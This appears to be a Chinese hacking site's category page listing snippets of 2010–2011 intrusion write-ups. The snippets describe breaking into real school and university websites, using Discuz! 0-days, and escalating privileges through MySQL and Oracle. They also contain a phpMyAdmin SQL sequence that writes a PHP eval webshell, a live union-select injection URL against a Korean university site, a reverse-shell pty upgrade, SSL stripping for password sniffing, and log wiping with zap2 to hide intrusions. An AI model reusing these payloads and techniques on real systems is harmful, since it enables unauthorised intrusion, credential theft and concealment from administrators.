Linux安全网 - Linux操作系统_Linux 命令_Linux教程_Linux黑客

无线路由器886N 无线路由器886N千兆版
搜索:
您的位置: Linux安全网 > Linux安全 >
  • Linux安全# 友情检测--亳州师范学院网站
  • 日期:2011-07-22 点击:220xiaowei'blog www.xiaoweio.cn 过程:过程也很简单,百度搜索安徽学校目录,随机找了个! site下就站点源码是什么,漏洞很bt,我现在看源码很准哦,大概有10个左右,看首页布局 就知道 了 ,哈哈哈。。。下次百度搜索 安徽大学目录! 呵呵 无聊死。。。。。。
  • Linux安全# 友情检测--安徽文达电脑学校
  • 日期:2011-07-22 点击:222xiaowei'blog www.xiaoweio.cn 友情检测--安徽文达电脑学校 从论坛入手的Discuz! Board Version 7.0.0 留下个足迹 : http://www.wendaedu.com/test.htm
  • Linux安全# 6月23日Discuz!多版本爆存储型XSS脚本漏洞 (0day)
  • 日期:2011-06-24 点击:2332009年一次偶然间测试发现的此XSS漏洞,因为是存储型的,我想大家应该知道它的危害吧。相隔这么多年DZ不断的更新版本,但此漏洞依然存在,今天就发布出来吧!留着也没什么用会长毛的,呵呵。 在此我要感谢一下我的好朋友Jackal在09年的时候一起帮我测试漏洞的
  • Linux安全# 6月2日 Discuz! X1.5 0day漏洞利用方法
  • 日期:2011-06-04 点击:5826月2日,网络上开始流传一个影响到Discuz! X1.5的0day漏洞 来源:http://www.linuxso.com 1 系统安装有php,并且加入系统环境变量 打开cmd.bat 执行 php linuxso.php http://www.xxxxx.com 2 等等几分钟即可获取小马 类似 http://www.xxx.com/data/avatar/a/3
  • Linux安全# 最新linux提权之mysql的root权限通过system函数提权
  • 日期:2011-03-24 点击:1908linux提权,这是一种常规linux提权方式,mysql以root 权限 登录时提权 mysql5.x 的linux版本下面有一个函数,可以帮助我们干很多猥琐的事情,这个函数4。x下面貌似没有,原来一直没发现,也没去查函数手册,就我自己的经验来写点东西。4,x的 明天再看看函数手册,再装一
  • Linux安全# 最新phpmyadmin后台拿shell方法和技巧
  • 日期:2011-03-17 点击:473Create TABLE linuxso (cmd text NOT NULL); Insert INTO linuxso (cmd) VALUES(?php eval($_POST[cmd])?); select cmd from study into outfile E:/wamp/www/7.php; Drop TABLE IF EXISTS study; Create TABLE `wangzi` (`wangzi` TEXT NOT NULL) TYPE = MY
  • Linux安全# mysql使用udf提权的高级技巧-应对can't open shared library 'ud
  • 日期:2011-03-14 点击:299对于cant open shared library udf.dll相信很多使用mysql提权的朋友应该都不会感到陌生吧,明明是root用户 但是在使用udf.dll提权创建自定义函数时却提示这样的错误,以前遇到这种情况一般都会放弃。 经过测试发现appserv搭建php环境能利用udf.dll提权 5.037
  • Linux安全# 一次韩国Linux服务器入侵现场及入侵棒子的经验总结
  • 日期:2011-03-13 点击:724忘了是谁在群里发了一个注入点,其本人似乎是在做评估国外尤其是韩国站的安全性的练手。 当时是一个很简单的注入点: http://ship.iuk.ac.kr/sub5_4.php?seq=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 得到数据: ship root@localhost 5.0
  • Linux安全# 全面了解四种级别攻击Linux服务器的方式
  • 日期:2011-03-05 点击:549Linux在过去的一年越来越受到关注,在新的一年里Linux也会受到很多人的喜欢。现在很多中小企业随着业务的扩展,于是就导致很多的网络服务器应用Linux操作系统。这样Linux服务器的安全性能受到越来越多的关注,这里根据Linux服务器受到攻击的深度以级别形式列
  • Linux安全# 手工注射Oralce数据库提权笔记
  • 日期:2011-03-05 点击:292很快便连接上oracle服务器,此时发现: 1.连接后不是dba权限 2.不能利用SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES漏洞提升权限 3.运行SELECT UTL_HTTP.request(http://xxxxxxxxxxx/login.jsp) FROM dual 后发现oracle服务器不能连接网络。 幸运的
  • Linux安全# 渗透某大型内网入侵过程
  • 日期:2010-11-18 点击:948本文阐述:文章从网站入侵到内网渗透提权,作者给大家带来了一篇精彩的内网渗透文章。读后此文你能清晰的认识到内网入侵的细节技术。 由于平时比较忙,用了很久的VPN肉鸡飞掉了,近来正好有时间于是打开google搜索upfile.asp开始找肉鸡,来了台湾某XX站, ht
  • Linux安全# MSSQL 入侵提权之内网渗透案例分析
  • 日期:2010-11-18 点击:274图文:udb311 主题:MSSQL内网渗透案例分析 发表:黑白前线 描述:对于内网渗透技术一直感觉很神秘,手中正巧有一个webshell是内网服务器。借此机会练习下内网入侵渗透技术!本文敏感信息以屏蔽!密码都以*号代替。此次过程主要运用到xp_cmdshell恢复与执行
  • Linux安全# SQL另类注入之绕过后台登陆验证
  • 日期:2010-11-18 点击:316要 这段时间在学习Linux的基础应用,玩腻了脚本注入后总觉得黑客方面老是停留在整天玩注入漏洞,或者其他的脚本漏洞技术也没法得到提高。所以静下心来给自己安排了个学习计划,先从Linux学起,完了再学习编程以及业余时间深入研究下脚本及数据库。 最近在学
  • Linux安全# 简述某次拿下外国大学网站
  • 日期:2010-11-18 点击:381这次说个端口的。 很多人觉得X-Scan过时了,几乎没有人用X-Scan了。如果某些小黑兴起,想搞下国外网站,不是拿着小黑、明小子一顿乱扫就是工具的狂轰。一点技术含量都没有,实在让人无奈。 前几天还是前几个小时,tank还问我,怎么php的手工注入语句那么简单
  • Linux安全# Apache后缀名解析漏洞分析
  • 日期:2010-11-18 点击:340我们都知道windows2003 + IIS6.0下,如果目录结构中有xxx.asp这样的目录,那么所有这个目录下的文件不管扩展名为什么,都会当作asp来解析。我们一般称这个漏洞为 windows2003+iis6.0目录解析漏洞。但是大家可能不知道的是,apache服务器也存在类似的解析漏洞
  • Linux安全# 深入阐述WPA-PSK-TKIP及AES的破解
  • 日期:2010-11-18 点击:1366前置知识 1)无线网络安全及面临的潜在威胁 之前已说明了其危害性,这里不再重复阐述,其主要入侵方式可由图1表示。 javascript:dcs.images.doResizes(this,0,null); border=0 图1 当黑客获得AP加密密码,即可在自己的无线网卡上进行对应配置,就可以通过该A
  • Linux安全# 突破SSL嗅探密码方法
  • 日期:2010-11-18 点击:257局域网利用SSLSTRIP突破SSL嗅探密码 准备工作 下载sslstrip,我们下载的是最新版本 ?wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.7.tar.gz 访问这里http://www.thoughtcrime.org/software/sslstrip/获得更多帮助 安装: python setup.py
  • Linux安全# 绕过网关渗透某官网的详细步骤
  • 日期:2010-11-18 点击:375想要进入官网,首选要突破网关(GetWay),这很容易理解,因为一个内网要访问internet总是必然通过网关接入的,至于怎样突破网关,这和进入不是网关的服务器没有什么两样,就不说了。 突破网关以后,我们的目标就是通过网关(IP为202.98.*.*)上网的 192.168
  • Linux安全# 如何改善webshell反向连接的体验
  • 日期:2010-10-26 点击:216通过webshell反弹回来的shell,体验太差;而且这台机器前又有硬件防火墙,ssh等通通连接不上。 在添加完用户后,可以通过ssh反向连接的方式改善,前提是你有一台可控制的开启sshd服务的机器。 首先: python -c 'import pty; pty. spawn (/bin/sh)'得到一个能使用
  • Linux安全# 隐藏自己
  • 日期:2010-10-22 点击:307Zap2 (清除 wtmp/lastlog/utmp记录) 网络上有很多不同的日志清除程序,其中最好的是zap2。我编译后称为z2 在你获得root的访问权后立即运行z2这个程序。现在你比刚才就安全多了。现在再用w或who命令来查看一下,你已静换岜籾tmp记录了。如果 你要使用 ftp或
无线路由器家用爆款
推荐文章
阅读排行
随机推荐
关于我们 - 联系我们 - 广告服务 - 友情链接 - 网站地图 - 版权声明 - 发展历史

Copyright © 2010-2015 Linux安全网 LinuxSo.Com, All Rights Reserved. 豫ICP备12027123号-1